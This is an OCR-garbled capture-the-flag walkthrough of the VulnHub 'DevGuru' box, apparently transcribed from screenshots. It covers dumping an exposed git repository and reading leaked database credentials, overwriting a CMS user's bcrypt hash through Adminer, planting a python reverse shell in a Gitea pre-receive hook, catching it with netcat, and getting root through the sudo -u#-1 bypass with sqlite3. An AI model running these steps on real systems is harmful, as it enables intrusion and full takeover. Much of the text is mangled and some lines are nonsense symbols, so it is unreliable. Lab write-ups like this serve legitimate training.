vulnhub

View on GitHub

Devguru

12 June 2022 10:53 PM

O a devguru.local:8585 Google Hacking DB Vigenere Solver- MN... LxdPrivi1ege Escalatio„, Home Explore Help GTFOBins Basic Linux Privilege E. Online - Reverse Shell Beyond SGLi: Obfusca... GitHub - bonsaiviking/, Write-up] Vulnix- pta... e MDS Online I Free MD... Register Sign In Gitea: Git with a cup of tea A painless, self-hosted Git service Easy to install Cross-platform

O •e Google Hacking DB VigenereSolver-ww... Lxdprivilege Escalatio... a 192.168.43.194 DevGuru GTFOBins Basic Linux Privilege Online - ReverseShell Beyond SQLi:Obfusca... GitHub- bonsaiviking/... [Write-up] Vulnix- Pla... Call us : *23-345-67890 support@devguru.local MDS Online I Frer HOME ABOUT SERVICES PORTFOLIO BLOG CONTACT o GET A QUOTE O/ Prepare We are GET STARTED Dev Guru.

(kaliS —/GitT001s/Extractor] website extractor. sh README. md (kaliS kali $ cd website kali total 12 drwxr-xr-x 3 kali drwxr-xr-x 3 kali drwxr-xr-x 8 kali (kaliS kali —/GitT001s/Extractor) —/GitT001s/Extractor/website] kali 4096 Jun 13 03:32 kali 4096 Jun 13 03:32 kali 4096 Jun 13 03:35 ø-7de91157øøc5656c670b34987c6fbffd39d9øcf2 —/GitT001s/Extractor/website] $ cd 0-7de91157øøc5656c670b34987c6fbffd39d90cf2 (kali@ kali -/GitT001s/Extractor/website/ø-7de91157øøc5656c67øb34987c6fbffd39d9øcf2] adminer.php artisan bootstrap commit-meta. txt config index. php modules plugins README. md server. php storage themes

•e Google Hacking DB Vigenere Solver Lid Privilege Escalatio„ GTFOBins Basic Linux Privilege Language: • English Adminer 47.7 4.8.1 (MySQL) gltea@bcalhost Login System MYSQL v localhost Permanent bgin

(kaliS -L/Extractor/website/ø-7de91157øøc5656c67øb34987c6fbffd39d9øcf2/config] broadcasting.php cms. php session . php app.php database. php filesystems.php queue. php cookie. php environment. php mail. php services . php view. php auth. php cache. php kali@ -/.-/Extractor/website/ø-7de91157øøc5656c67øb34987c6fbffd39d9øcf2/config] cat database.php <?php return [ PDO Fetch style BY default, database results will stdCIass object; however, you may array format for simplicity. Here be returned as instances of the PHP desire to retrieve records in an you can tweak the fetch style.

'sqlite' [ 'driver' 'database' ' prefix' 'mysql' [ 'driver' 'engine' 'host' ' port ' 'database' ' username ' ' password ' ' charset' ' collation ' ' prefix' ' varcharmax ' 'pgsql' [ 'driver' 'host' ' port ' 'database' ' username ' ' password ' ' charset' ' prefix' 'sqlite', ' storage/database. sqlite' , 'mysql ' 'InnoDB', 'localhost', 3306, 'octoberdb' , 'october' , 'SQ66EBYX4GT3bYXH' , 'utf8mb4', 'utf8mb4 unicode ci' , 191, 'pgsql', 'localhost' , 5432 , 'database' , 'root', 'utf8',

Solver - Lxd Privilege Escalatio,.. Basic Linux Privilege o GTFOBins Login Access denied for user toot@localhost• System MYSQL v localhost October Database database O Permanent bgin

DB: OCtOberdb SQL command Import Export create table select backend access_log select backend users select backend _users_grcnaps select backerui _user_groups select select backeM user roles select backerui user throttle select cache selectcms theme data select select cms_theme_templates select deferred_bindings select failed_jobs select jobs select migrations Select data Show Structure Alter table Limit New item Text k ngth Action activation_code SELECT • FROM O edit 1 01 row first_name last_name bgin frank Frank Modify trankgdevguru.local S2yS10$bpswBtbAN61MYT27pJMom0GutDF2RKZKYZITAupZ3xgeAaYgN6EKK NULL Export (1) S2ySIO$hnhKQ8hT selected (o)

Bcrypt - Wikipedia bcrypt is a password-hashing $2x$, $2ys (June 2011). In Ju

Generator Enter plain text to hash pass Select the number of rounds Generate Hash Hashed Output: $2a$04$Qmnraqc28NL3r9gpL5qeluJwu1isrqJh Atu2esWltbviuAzbgzqlO

Edit: backend users last_name persist_code reset_password_code

O a o' 192.168.43.194/backend/backend/auth/signin 'Iver - Lxd Privilege Escalatio___ GTFOBins Basic Linux Privilege Online - Reverse Shell •i Beyond SQLi: Obfusca___ GitHub - bonsaivikingL (Write-up' OCIOBERO Getting back to basics frank Fotgot password?

O a 192.168.43.194/backend/backend Solver - ww (e Hacki DB Dashboard WELCOME OCIOBERO SYSTEM STATUS O Pencing sottware O Some issues need attention O System O Event Request Og A Online siruze Media Lxd Privi Escalatio... GTFOBins Settings Basic Linux Privi Online SGLi: Obfusca... WEBSITE GitHub - rite-u Vulnix - MDS Online FreeMD... Welcome back to October-CMS. Frank. Ycn•r last sign in was Fri, Nov 20, 2020 12:31 AM access logs Update November 2020 Online Manage themes Customize theme

Google Hacking DB Vigenere Solver - ww LxdPrivilege Esca Basic Linux Privilege Online - Reverse Shell Beyond GitHub - bonsaiviking/. /shell no layout [Write-up] Vuln Dashboard Pages Partials Content Assets Components Media Settings Q Jamut Blog Articles URL The main page, with all Contact Us u AL : Icontæt•us Main Pap Mac* with CMS-caput URL : Pricing URL T Jpricim URL LLAL: 'shell - blog Blog Category URL Vlekng Blog Post Pontoliox shell Settings Name Aboutx Meta H'&jon pages are accessible only by loggod•in backend users. MarkLQ Codc ffthis.page.•yvar

shell Settings Name Descr Meta /shell no layout Hdden pages accessible only by bgged-in back-end Markup I Ccxie I function 2

[database] Database DB TYPE HOST NAME USER to use. Either "mysql", "postgres", "mssql" = mysql = 127.ø.ø.1:3306 = gitea = gitea or "sqlite3". Use PASSWD = PASSWD For postgres, the user must -your password* for quoting if you use special characters in the password. = UfFPTF8C8jjxVF2m schema to use if different from "public". The schema must exist beforehand have creation privileges on it, and the user search path must be set

Language, . English Adminer 47.7 Login Logout successful. Thanks for using Adminer, consider donating. System My-SQL v Server Username gitea Password O Permanent bgin

Er,glish Adminer 4.77 48.1 SQL command Export MySQL » localhost Select database Create database Privileges Process list Variables Status MysQL version: 5.5.5-10.1.47.MariaDB-oubuntuo.18.04.1 through PHP extension MysQLi Logged as: Database • Refresh Cdlation Tables Size - Commie o g itea O intormation_schema selected (o) drop uttgmb4_gen eral_ci

( 0 製 面 x ョ 谷 に ド ロ 謝 ー 第 p 」 ( 0 ) p 釧 刈 ヤ こ こ ど 8PP ヤ 9 リ 08 0 こ ~ 29 」 ヤ 091PE ( 」 ー ー ロ 都 24 ー 一 コ 0 第 当 4 導 面 叩 ね 1 MON 一 - Ⅲ u 川 御 ロ 司 q 田 u0S 叩 お 0 川 に n 」 に LIS ロ 0 卩 S を 驅 P お

~ u 」 「 「 E97 」 bMO 工 、 6% 工 ) ! 0 , 5 d 丨 36 雟 」 tu 。 6 , use" pmssed 一 9 山 23n10 | 601 廡 601

e Solver - ww... Lid Privilege Escalatio... elp GTFOBins • Basic Linux Privilege E.. Online - Reverse Shell In d- OpenlD Sign In or Email frank password Remember Me Beyond SQLi:Obfusca... GitHub - bonsaiviking/. Sign In Forgot password? Need an account? Register

Dashboard Issues Pull Requests Milestones Explore Mar Apt Repository Repositories q Find e AN O Sowces Forks frank/devguru- website Organization O total contributions in the last 12 months frank pushed to master at frank/devguru-website 7de911S709 first commit year ago frank created rQository frank/ devguru-website year frank created frank/' devguru-vvebsite I year ago Mirrors Collab•rative

O a devguru.local:8585/frank/devguru-website Google Hacking DB Vigenere Solver -w•w... Dashboard Issues Pull Requests Lxd Privilege Escalatio.. GTFOBins Milestones Explore frank / devguru-website Basic Linux Privilege E. , Pull Requests Online - Reverse Shell Beyond SGLi: Obfusca... Activity GitHub - bonsaiviking/. [Write-up) Vulnix - Pla... Settings 1 year ago I year ago 1 year ago I year ago I year ago 1 year ago I year ago MDS Online I Free MD... Watch Star 72 MiB 0 Code @ Issues Releases Wiki Secure, Fast, Awesome website! Manage Topics @1Commit V 1 Branch frank 7deg1157ö0 bootstrap config modules plugins/ October/ demo storage New pull Request first commit first commit first commit first commit first commit first commit first commit

frank / devguru-website O Releases Branches W,ki Web hooks Watch LFS o Star O Code Git @ Issues Pull Requests Activity Settings Repository Collaborators Git Hooks Deploy Keys Git hooks are powered by Git itself. You can edit hook files below to set up custom operations. • pre-receive • update • post-receive

Repository Collaborators Branches Web hooks Git Hooks Deploy Keys IFS If the hook is inactive, sarnple content will be presented. Leaving content to an empty value will disable this hook. Hook Nane pre-receive I python3 -c ' import os,pty, , " 4444)); f)for f

frank / devguru-website Releases Wiki Watch Activity Star Code @ Issues O n Pull Requests O (D or Cancel Preview Changes Settings devguru•website README.md O Edit File @ Preview 27 29 • simpcexr•u- PHY extension Some os distributions nay require you to manually install some Of the required PHP extensions. When using Ubuntu, the following comand can be run to install all required extensions: bash sudo apt-get update sudo apt-get install php php-ctype php-curl php-xnl php- fileinfo php-gd php-json php-mbstring php-mysqL php- sqlite3 php-zip

adding some blank lines

Commit Changes Commit to the master branch. Create a new branch for this commit and start a pull request. Commit Changes Cancel

commit changes

(kaliS -L/Extractor/website/ø-7de91157øøc5656c67øb34987c6fb $ nc -nvlp 4444 listening on [any] 4444 . connect to [192.168.43.208] from (UNKNOWN) [192.168.43.194] 60170 $ id id groups=løøø(frank) $1

franködevguru:-$ sudo -l Vlatching Defaults entries for frank on devguru: env_reset, mail_badpass, : /usr/local/bin\ : /usr/sbin Jser frank may run the following commands on devguru: (ALL, !root) NOPASSWD: /usr/bin/sq1ite3 1 franködevguru:-$

sudo -V Sudo version 1.8.21p2 sudoers policy plugin version 1.8.21p2 Sudoers file grammar version 46 Sudoers I/O plugin version 1.8.21p2 sudo -un-1 whoami root id root) sqlite3 /dev/null frank ) ' . shell /bin/bash'